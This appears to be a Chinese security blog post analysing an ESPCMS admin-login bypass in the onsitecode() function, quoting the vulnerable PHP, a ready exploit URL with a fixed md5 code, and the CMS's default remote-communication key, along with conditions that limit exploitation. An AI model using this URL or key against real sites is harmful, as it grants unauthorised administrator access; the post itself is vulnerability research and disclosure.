- A+
显示不全请点击全屏阅读
时隔好久,童鞋相继发过这个CMS漏洞,今天大体看了下,问题还有,官方还是一直在修复漏洞。
问题出在后台文件adminsoft\control\adminuser.php文件
代码问题出在函数onsitecode()
function onsitecode() {
parent::start_template();
$db_table = db_prefix . "admin_member";
$linkURL = $_SERVER['HTTP_REFERER'];
$siteid = $this->fun->accept('siteid', 'R');
$code = $this->fun->accept('code', 'R');
$adminid = $this->fun->accept('adminid', 'R');
$siteip = $this->fun->real_server_ip();
//echo $adminid;
if (empty($siteid) || empty($code) || empty($siteip) || empty($this->CON['sitecoedb']) || empty($adminid)) {
exit();
}
$codelist = md5($this->CON['sitecoedb'] . '_' . $siteip . '_' . adminfile);
if ($code == $codelist) {
$db_where = "username='$adminid' AND isclass=1 AND isremote=1";
$rsMember = $this->db->fetch_first('SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM ' . $db_table . ' WHERE ' . $db_where);
if (!$rsMember) {
exit('ESPCMS:Parameter error!');
} else {
$ipadd = $this->fun->ip($_SERVER['REMOTE_ADDR']);
$date = time();
$db_set = "intime=$date,ipadd=$ipadd,hit=hit+1";
$this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);
$db_table = db_prefix . 'admin_powergroup';
$db_where = 'id=' . $rsMember['powergroup'];
$rsPower = $this->db->fetch_first('SELECT powername,powerlist FROM ' . $db_table . ' WHERE ' . $db_where);
if ($rsPower['powerlist'] != 'all') {
$rsPower_array = explode('|', $rsPower['powerlist']);
$rsPower_array = is_array($rsPower_array) ? $this->fun->exp_array($rsPower_array) : $rsPower_array;
$sysArray = $this->get_powermenulist('all');
$sys_newsArray = array();
foreach ($sysArray as $key => $value) {
$sys_newsArray[] = $value['loadfun'];
}
$sys_newsArray = $this->fun->exp_array($sys_newsArray);
$diff_array = array_diff($sys_newsArray, $rsPower_array);
$rsPower['powerlist'] = implode('|', $diff_array);
}
$this->fun->setcookie("esp_powerlist", $this->fun->eccode($rsPower['powerlist'], 'ENCODE', db_pscode));
$this->fun->setcookie('ecisp_admininfo', $this->fun->eccode("$rsMember[id]|$rsMember[username]|$rsMember
|" . md5($_SERVER['HTTP_USER_AGENT']) . '|' . $rsMember[powergroup] . '|' . $rsMember[inputclassid] . '|' . md5(admin_ClassURL), 'ENCODE', db_pscode));
$this->writelog($this->lng['adminuser_login_log_action'], $this->lng['log_extra_ok'] . ' user=' . $rsMember['username'], $rsMember['username']);
header('location: index.php?archive=management&action=tab&loadfun=mangercenter&out=tabcenter');
exit('true');
}
}
exit();
}
只要$code == $codelist就通过验证,那么我们可以自己构造,主要就是
$codelist = md5($this->CON[‘sitecoedb’] . ‘_’ . $siteip . ‘_’ . adminfile);
测试代码如下
index.php?archive=adminuser&action=sitecode&adminid=admin&siteid=1&code=f01f70868bbd44aba6ffc8602367abea
直接访问登录后台。
漏洞作者:j8g
Seay分析:
找到j8说的这个文件,看了下确实存在这个问题,不过也有点鸡肋。
给出的exp
adminsoft/index.php?archive=adminuser&action=sitecode&adminid=admin&siteid=1&code=f01f70868bbd44aba6ffc8602367abea
一、看到
if (empty($siteid) || empty($code) || empty($siteip) || empty($this->CON['sitecoedb']) || empty($adminid)) {
exit();
}
$codelist = md5($this->CON['sitecoedb'] . '_' . $siteip . '_' . adminfile);
但是默认CON[‘sitecoedb’]是为空的,要在后台更新一下设置才会变成
//远程通信密钥
'sitecoedb'=>'7a6355a4a18b136036439cc61efe069b',
这个是默认的,一般不会有什么人改。
二、
看到
if ($code == $codelist) {
$db_where = "username='$adminid' AND isclass=1 AND isremote=1";
$rsMember = $this->db->fetch_first('SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM ' . $db_table . ' WHERE ' . $db_where);
echo 'SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM ' . $db_table . ' WHERE ' . $db_where;
if (!$rsMember) {
exit('ESPCMS:Parameter error!');
} else {
$db_where = “username=’$adminid’ AND isclass=1 AND isremote=1”;
在where条件中
需要isremote=1才能成功查询到数据。
专门找了下这个参数,是要adminid这个管理员是集群管理员才会是1,
而默认这个是0,要管理员在后台的管理员设置成集群管理员这个漏洞才能成功利用。
最后上个图:
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
